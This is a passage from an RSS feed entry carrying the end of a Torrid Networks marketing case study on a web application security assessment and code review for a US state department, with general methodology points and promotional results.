<li>A web application audit was performed and the application was assessed from an attacker’s perspective. A “think like they think while breaking in” approach helped us find many flaws, which were pinned down and plugged.</li>
<li>Numerous attacks were executed against the application using commercial, open source and customized tools in order to determine the underlying vulnerabilities in the application.</li>
<li>The assessment methodology included, but was not limited to, checks for all the security issues identified in the OWASP Top 10 list, and many more.</li>
<li>Finally, a multi-faceted, multi-pronged report with step-by-step guidance on security best practices was handed over to them, written with its audience, generally the development team and managers, in mind.</li>
</ol>
<h3 style="text-align: justify;">The Results</h3>
<p style="text-align: justify;">Torrid helped them assess their overall security posture, strengthen their SDLC and mitigate the overall risks posed by insecure code.</p>
<ol style="text-align: justify;">
<li>Achieved end-to-end application data security without impacting performance.</li>
<li>Enabled protection for a high volume of users and for multiple web-based custom applications and databases, without extra coding.</li>
</ol>
<p>The post <a rel="nofollow" href="https://www.torridnetworks.com/resources/case-studies/code-review-and-web-application-security-assessment-for-a-us-state-department">Code Review and Web Application Security Assessment For a US State Department</a> appeared first on <a rel="nofollow" href="https://www.torridnetworks.com/home">Torrid Networks</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://www.torridnetworks.com/resources/case-studies/code-review-and-web-application-security-assessment-for-a-us-state-department/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
